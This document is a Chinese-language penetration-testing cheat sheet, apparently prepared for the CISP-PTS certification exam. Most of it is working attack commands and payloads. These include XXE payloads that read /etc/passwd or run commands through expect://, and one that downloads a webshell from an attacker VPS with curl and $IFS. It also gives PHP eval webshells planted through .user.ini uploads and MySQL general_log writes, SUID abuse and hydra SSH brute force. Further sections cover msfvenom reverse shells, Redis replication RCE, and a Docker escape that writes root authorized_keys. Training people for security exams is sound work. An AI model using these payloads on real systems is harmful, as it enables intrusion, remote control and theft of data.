CISP-PTS中的渗透小技巧分享

• 写公钥的两条config命令和一条set命令均需要把前面的命令的空格改成英文格式的冒号。
• 除此之外，还需要加上dict协议的Redis请求地址，如：dict://localhost:6379/

1.3、XXE相关技巧 1.3.1、XXE载荷构技巧 使用seclists的XXE-Fuzzing.txt的第9行，做一个简单改造即可使用。对比如下： 改造前： <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 改造后： <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> XXE-Fuzzing.txt的路径：SecLists\Fuzzing\XXE-Fuzzing.txt 有了上述载荷以后，再加上回显位置即可成功利用，完整载荷示例： <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> <name> <email> &foo; </email> </name> 1.3.2、命令执行&&getshell 命令执行的原理是把文件读取用的file://协议换成了expect://协议。 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://id" >]> <name> <email> &foo; </email> </name> getshell则是命令执行的变种，通过上传webshell来。 利用前提：知道目标服务器的脚本语言类型和webshell上传后的大致位置。如果是OSS上，直接寄。 1）使用python托管webshell python -m http.server 8088 2）下载webshell <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://curl$IFS'vps_addr:port/111.php'$IFS-o$IFS'222.php'" >]> <name> <email> &foo; </email> </name> 此处webshell下载解析： curl -O vps_addr:port/111.php curl vps_addr:port/111.php -o 222.php 空格用$IFS来替代，没啥好说的，常规思路。 下载url不能带协议 下载url用单引号包裹，如果是-o方式，保存文件的名称也用单引号包裹起来。 1.4、.user.ini文件上传 这个跟.htaccess差不多，.user.ini是php给用户的自定义配置文件，可将指定文件按照php脚本文件的形式解析。 介绍：https://blog.csdn.net/cosmoslin/article/details/120793126 利用过程： 1）上传.user.ini filename：.user.ini Content-type：image/jpeg 文件正文： GIF89a auto_prepend_file = aaa.jpg 2）上传webshell filename: aaa.jpg Content-type：image/jpeg 文件正文： GIF89a <?php @eval($_POST[22]);?> # 可替换为其他webshell 1.5、盲注分析 导出数据包： 文件——导出分组解析结果——为纯文本 通过notepad++解码： 提取所有注入数据包，此处使用notepad++中的标记功能，查找模式设置为正则表达式。 提取出来以后，找到临界值。当上面的查询语句从1,1到2,1,则上一条语句的=''的值就是SQLi获取到的数据。 找到所有数据后，用英文的逗号隔开，然后使用convert从dec转成text。 1.6、phpmyadmin后台写日志马 前提：知道web根目录。 set global general_log = 'on'; set global general_log_file = 'c:/phpstudy/111.php' select "<?php @eval($_POST[22]);?>" web根目录可通过phpinfo或phpstudy探针等信息获取web目录，phpstudy探针： 写入webshell的浏览器写入示例： 0x02 后渗透阶段 2.1、SUID提权 find / -perm -u=s -type f 2>/dev/null find /etc/passwd -exec ls /root \; find /etc/passwd -exec cat /root/key.cisp \; 2.2、proxychains爆破

• 修改/etc/proxychains4.conf，将proxy_dns注释掉即可。
• 设置爆破线程为1.
• hydra通过proxychains代理爆破命令示例：

proxychains hydra ssh://192.168.1.1 -l root -p /usr/share/wordlists/metasploit/unix_password.txt -t 1 2.3、增加路由 run autoroute -s 192.168.30.0/24 增加192.168.30.0/24的路由 run autoroute -p 查看已添加的路由 2.4、设置socks代理 search socks use 0 set srvhost 127.0.0.1 exploit 2.5、msf上线机器 载荷生成 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.44 LPORT=4443 -f exe -o win7.exe 设置监听 msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.0.44 msf6 exploit(multi/handler) > set lport 4443 msf6 exploit(multi/handler) > exploit linux，web_delivery上线 use exploit/multi/script/web_delivery（加载脚本模块） set payload linux/x64/meterpreter/reverse_tcp set LHOST 172.16.143.132 set target 7 exploit 2.6、redis主从复制rce search redis msf6 exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 192.168.100.139 msf6 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 192.168.100.144 msf6 exploit(linux/redis/redis_replication_cmd_exec) > set lhost 192.168.100.144 msf6 exploit(linux/redis/redis_replication_cmd_exec) > exploit 2.7、docker逃逸-写公钥 查看设备情况 fdisk -l 创建目录并挂到对应设备 mkdir /test mount /dev/sda5 /test 写公钥 ssh-keygen -f tmp cat tmp.pub ls -al /test/root/ #没有.ssh，就创建.ssh echo 'ssh_key' > /test/root/.ssh/authorized_keys ssh -i tmp root@192.168.1.130